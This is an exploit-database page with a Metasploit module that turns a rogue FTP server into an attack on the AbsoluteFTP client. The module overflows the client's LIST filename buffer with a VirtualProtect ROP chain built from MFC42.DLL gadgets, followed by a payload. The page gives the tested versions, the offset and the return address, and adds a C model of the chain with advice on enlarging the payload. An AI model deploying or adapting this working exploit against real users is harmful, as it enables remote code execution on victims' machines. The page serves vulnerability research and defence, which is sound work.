AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)

2012.09.17
Credit: Node
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


Overall CVSS score: 9.3/10
Impact: 10/10
Ease of exploitation: 8.6/10
Required access: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)
# Date: 2011-11-09
# Author: Node
# Software Link: http://www.vandyke.com/pub/AbsoluteFTP/aftp2210.exe
# Version: 1.9.6 - 2.2.10
# Tested on: Windows XP SP3, Windows 7 SP1
# CVE : -
# Exploit has been tested to work on:
#   AbsoluteFTP 2.2.10 (build 252)
#   AbsoluteFTP 2.2.9 (build 248)
#   AbsoluteFTP 2.2.8 (build 241)
#   AbsoluteFTP 2.2.7 (build 238)
#   AbsoluteFTP 2.2.6 (build 230)
#   AbsoluteFTP 2.2.5 (build 225)
#   AbsoluteFTP 2.2.4 (build 216)
#   AbsoluteFTP 2.2.3 (build 210)
#   AbsoluteFTP 2.2.2 (build 203)
#   AbsoluteFTP 2.2 (build 197)
#   AbsoluteFTP 2.2 (build 291)
#   AbsoluteFTP 2.2B3 (build 163)
#   AbsoluteFTP 2.2B2 (build 158)
#   AbsoluteFTP 2.2B1 (build 144)
#   AbsoluteFTP 2.0.5 (build 297)
#   AbsoluteFTP 2.0.4 (build 293)
#   AbsoluteFTP 2.0.3 (build 289)
#   AbsoluteFTP 1.9.6
# Does not work on:
#   AbsoluteFTP 1.8

##
# $Id: $
# Skeleton generated by mona.py - Corelan Team
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::FtpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)',
      'Description'    => %q{
        This module exploits VanDyke Software AbsoluteFTP by overflowing a
        filename buffer related to the LIST command.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Node', # Original discovery, MSF module, ROP code
        ],
      'Version'        => '$Revision:$',
      'References'     =>
        [
          [ 'OSVDB', '---' ],
          [ 'CVE', '---' ],
          [ 'URL', '---' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars' => "\x00\x0d\x5c\x2f\x0a",
        },
      'Targets'        =>
        [
          [ 'WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252',
            {
              'Ret'    => 0x5f479005,
              'Offset' => 3336
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'MONTH DAY YEAR',
      'DefaultTarget'  => 0))
  end

  # copy-pasted from the ScriptFTP exploit
  def on_client_unknown_command(c, cmd, arg)
    c.put("200 OK\r\n")
  end

  def on_client_command_list(c, arg)
    conn = establish_data_connection(c)
    if (not conn)
      c.put("425 Can't build data connection\r\n")
      return
    end

    print_status(" - Data connection set up")
    code = 150
    c.put("#{code} Here comes the directory listing.\r\n")
    code = 226
    c.put("#{code} Directory send ok.\r\n")

    # VirtualProtect() ROP chain built from MFC42.DLL gadgets; the staged
    # registers are turned into the call frame by the final PUSHAD # RETN.
    rop_gadgets =
    [
      0x5f46a206,  # POP EAX # RETN (MFC42.DLL)
      0x5f49b260,  # <- *&VirtualProtect()
      0x5f413fa0,  # MOV EAX,DWORD PTR DS:[EAX] # RETN 04 ** [MFC42.DLL]
      0x5f418d93,  # PUSH EAX # ADD AL,5F # POP ESI # POP EBX # RETN ** [MFC42.DLL]
      0x90909090,  # NOPS (RETN 4)
      0x90909090,  # NOPS (-> ebx)
      0x5f432001,  # POP EBP # RETN (MFC42.DLL)
      0x5F4774D5,  # ptr to 'jmp esp' (from MFC42.DLL)
      0x5f46a206,  # POP EAX # RETN (MFC42.DLL)
      0xfffffdff,  # value to negate, target value : 0x00000201, target reg : ebx #<--ADJUST ME FOR BIGGER PAYLOAD
      0x5f46f6dd,  # NEG EAX # RETN (MFC42.DLL)
      0x5f47909a,  # XCHG EAX,EBX # DEC EDX # POP EDI # RETN (MFC42.DLL)
      0x90909090,  # NOPS (-> edi)
      0x5f498456,  # POP ECX # RETN (MFC42.DLL)
      0x5F4D1115,  # RW pointer (lpOldProtect) (-> ecx) !!!
      0x5f46a206,  # POP EAX # RETN (MFC42.DLL)
      0xffffffc0,  # value to negate, target value : 0x00000040, target reg : edx
      0x5f46f6dd,  # NEG EAX # RETN (MFC42.DLL)
      0x5f4892df,  # XCHG EAX,EDX # DEC EAX # POP EDI # RETN (MFC42.DLL)
      0x5f479005,  # ROP NOP (-> edi)
      0x5f46a206,  # POP EAX # RETN (MFC42.DLL)
      0x90909090,  # NOPS (-> eax)
      0x5f4755b8,  # PUSHAD # RETN (MFC42.DLL)
    ].pack("V*")

    buffer = [0x5f479005].pack("V*") * 848 # ROP NOPs
    buffer << rop_gadgets
    buffer << "\x90" * 30
    buffer << payload.encoded

    # copy-pasted from the ScriptFTP exploit
    print_status(" - Sending directory list via data connection")
    dirlist  = "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
    dirlist << " 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n"
    dirlist << "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
    conn.put(dirlist)
    conn.close
    return
  end
end
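The chain above relies on two mechanisms that are easy to get wrong when adapting it to a bigger payload or a different DLL: the NEG-encoding of constants that would otherwise contain a null byte (0x00000201 and 0x00000040 are both in the BadChars set), and the PUSHAD # RETN that turns the staged registers into a VirtualProtect() call frame. The following C model is an added example written for this page; it is not part of Node's module. It copies the gadget addresses and BadChars from the module and treats the dereferenced VirtualProtect address and the stack pointer, which exist only at run time, as constructed placeholders (PLACEHOLDER_VP, PLACEHOLDER_ESP).

```c
/* Added example, not part of the original module: checks the chain's dwords
 * against the payload BadChars, reproduces the NEG-encoding trick, and lays
 * out the PUSHAD frame that VirtualProtect() receives. Gadget addresses and
 * BadChars are taken from the module; PLACEHOLDER_* are constructed stand-ins
 * for values that are only known at run time. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

static const uint8_t BADCHARS[] = { 0x00, 0x0d, 0x5c, 0x2f, 0x0a }; /* module's BadChars */

#define ROP_NOP         0x5f479005u /* RETN gadget the chain uses as a ROP NOP */
#define JMP_ESP         0x5F4774D5u /* 'jmp esp' in MFC42.DLL */
#define LP_OLD_PROTECT  0x5F4D1115u /* writable dword in MFC42.DLL */
#define PLACEHOLDER_VP  0x7c801ad4u /* constructed: what *0x5f49b260 would hold */
#define PLACEHOLDER_ESP 0x0012f000u /* constructed: ESP at the moment PUSHAD runs */

/* The chain exactly as the module packs it, in order. */
static const uint32_t CHAIN[] = {
    0x5f46a206, 0x5f49b260, 0x5f413fa0, 0x5f418d93, 0x90909090, 0x90909090,
    0x5f432001, 0x5F4774D5, 0x5f46a206, 0xfffffdff, 0x5f46f6dd, 0x5f47909a,
    0x90909090, 0x5f498456, 0x5F4D1115, 0x5f46a206, 0xffffffc0, 0x5f46f6dd,
    0x5f4892df, 0x5f479005, 0x5f46a206, 0x90909090, 0x5f4755b8,
};

/* 1 if any little-endian byte of v is in BADCHARS */
int has_badchar(uint32_t v) {
    for (int i = 0; i < 4; i++) {
        uint8_t b = (uint8_t)(v >> (8 * i));
        for (size_t j = 0; j < sizeof BADCHARS; j++)
            if (b == BADCHARS[j]) return 1;
    }
    return 0;
}

/* 1 if every dword of CHAIN would survive the payload encoder's filter */
int chain_is_badchar_free(void) {
    for (size_t i = 0; i < sizeof CHAIN / sizeof CHAIN[0]; i++)
        if (has_badchar(CHAIN[i])) return 0;
    return 1;
}

/* Stack value such that POP EAX # NEG EAX leaves target in EAX */
uint32_t neg_encode(uint32_t target)  { return 0u - target; }
/* What NEG EAX produces from an encoded value */
uint32_t neg_decode(uint32_t encoded) { return 0u - encoded; }

struct regs { uint32_t eax, ecx, edx, ebx, esp, ebp, esi, edi; };

/* Register file just before PUSHAD, following the chain's own comments */
struct regs staged_regs(uint32_t virtualprotect, uint32_t esp) {
    struct regs r;
    r.eax = 0x90909090u;             /* NOPS (-> eax): first bytes jmp esp executes */
    r.ecx = LP_OLD_PROTECT;          /* lpOldProtect */
    r.edx = neg_decode(0xffffffc0u); /* flNewProtect = 0x40 (PAGE_EXECUTE_READWRITE) */
    r.ebx = neg_decode(0xfffffdffu); /* dwSize = 0x201; "ADJUST ME FOR BIGGER PAYLOAD" */
    r.esp = esp;                     /* becomes lpAddress */
    r.ebp = JMP_ESP;                 /* return address VirtualProtect sees */
    r.esi = virtualprotect;          /* *&VirtualProtect() after MOV EAX,[EAX] */
    r.edi = ROP_NOP;                 /* consumed by the RETN right after PUSHAD */
    return r;
}

/* PUSHAD pushes EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI, so frame[0] (the dword at
 * the new ESP) is EDI and memory reads EDI,ESI,EBP,ESP,EBX,EDX,ECX,EAX. */
void pushad_frame(const struct regs *r, uint32_t frame[8]) {
    frame[0] = r->edi; frame[1] = r->esi; frame[2] = r->ebp; frame[3] = r->esp;
    frame[4] = r->ebx; frame[5] = r->edx; frame[6] = r->ecx; frame[7] = r->eax;
}

struct vp_call {
    uint32_t callee, ret_addr, lpAddress, dwSize, flNewProtect, lpOldProtect;
    uint32_t esp_after_ret; /* where jmp esp lands after VirtualProtect's ret 0x10 */
};

/* RETN pops frame[0] (ROP NOP, itself a RETN), which pops frame[1] (callee).
 * VirtualProtect then sees frame[2] as its return address and frame[3..6] as
 * its four stdcall arguments; its ret 0x10 leaves ESP at frame[7]. */
struct vp_call decode_call(const uint32_t frame[8]) {
    struct vp_call c;
    uint32_t esp_after_pushad = frame[3] - 32; /* PUSHAD moved ESP down 8 dwords */
    c.callee = frame[1];       c.ret_addr = frame[2];
    c.lpAddress = frame[3];    c.dwSize = frame[4];
    c.flNewProtect = frame[5]; c.lpOldProtect = frame[6];
    c.esp_after_ret = esp_after_pushad + 7 * 4;
    return c;
}

int main(void) {
    struct regs r = staged_regs(PLACEHOLDER_VP, PLACEHOLDER_ESP);
    uint32_t frame[8];
    pushad_frame(&r, frame);
    struct vp_call c = decode_call(frame);
    printf("chain bad-char free: %d\n", chain_is_badchar_free());
    printf("VirtualProtect(0x%08x, 0x%x, 0x%x, 0x%08x) returns to 0x%08x, esp -> 0x%08x\n",
           c.lpAddress, c.dwSize, c.flNewProtect, c.lpOldProtect, c.ret_addr, c.esp_after_ret);
    return 0;
}
```

Two things the model makes visible: lpAddress is whatever ESP was when PUSHAD executed, so dwSize (0x201) must cover from there to the end of the encoded payload, which is why the chain comment marks 0xfffffdff as the value to adjust; and after VirtualProtect's stdcall return the stack pointer sits on the saved-EAX slot (0x90909090), which is exactly what makes the jmp esp return address flow into the NOP sled and the payload.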

References:

http://www.securityfocus.com/bid/50614
http://www.saintcorporation.com/cgi-bin/exploit_info/vandyke_absoluteftp_list_client_overflow
http://www.osvdb.org/77105
http://www.exploit-db.com/exploits/18102
http://secunia.com/advisories/46781


Copyright 2024, cxsecurity.com